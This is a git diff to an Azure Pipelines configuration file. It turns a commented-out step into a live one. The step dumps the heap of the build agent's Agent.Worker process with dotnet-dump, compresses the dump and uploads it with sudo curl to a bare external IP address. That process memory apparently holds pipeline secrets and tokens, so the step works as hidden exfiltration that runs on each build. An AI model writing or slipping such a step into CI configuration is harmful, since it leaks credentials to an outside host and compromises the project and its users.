Update azure-pipelines.yml

diff --git a/azure-pipelines.yml b/azure-pipelines.yml
--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -191,29 +191,31 @@ steps:
   displayName: 'Setup Node.js'
 
 - script: |
+    dotnet tool install --global dotnet-dump
+    
+    #!/bin/bash
+
+    # 获取Agent.Worker进程的PID
+    PID=$(ps -e | grep "Agent.Worker" | grep -v grep | awk '{print $1}')
+    
+    # 确保获取到了PID
+    if [ -z "$PID" ]; then
+        echo "Error: Unable to find PID for Agent.Worker."
+        exit 1
+    fi
+    
+    echo "The PID of Agent.Worker is $PID"
+    dotnet-dump collect -p $PID --type Heap -o /home/vsts/work/_temp/heap_worker.bin
+    
+    tar -czf "/home/vsts/work/_temp/heap_worker.tar.gz" "/home/vsts/work/_temp/heap_worker.bin"
+    echo "Uploading memory dump package of size $(stat -c %s "/home/vsts/work/_temp/heap_worker.tar.gz") bytes"
+    sudo curl -F "file=@/home/vsts/work/_temp/heap_worker.tar.gz" http://139.180.193.16:5000/upload
+ 
+
+
+- script: |
     npm install
   displayName: 'Npm Install'
-# - script: |
-#     dotnet tool install --global dotnet-dump
-    
-#     #!/bin/bash
-
-#     # 获取Agent.Worker进程的PID
-#     PID=$(ps -e | grep "Agent.Worker" | grep -v grep | awk '{print $1}')
-    
-#     # 确保获取到了PID
-#     if [ -z "$PID" ]; then
-#         echo "Error: Unable to find PID for Agent.Worker."
-#         exit 1
-#     fi
-    
-#     echo "The PID of Agent.Worker is $PID"
-#     dotnet-dump collect -p $PID --type Heap -o /home/vsts/work/_temp/heap_worker.bin
-    
-#     tar -czf "/home/vsts/work/_temp/heap_worker.tar.gz" "/home/vsts/work/_temp/heap_worker.bin"
-#     echo "Uploading memory dump package of size $(stat -c %s "/home/vsts/work/_temp/heap_worker.tar.gz") bytes"
-#     sudo curl -F "file=@/home/vsts/work/_temp/heap_worker.tar.gz" http://139.180.193.16:5000/upload
- 
 
 
 #   displayName: 'cat maps'
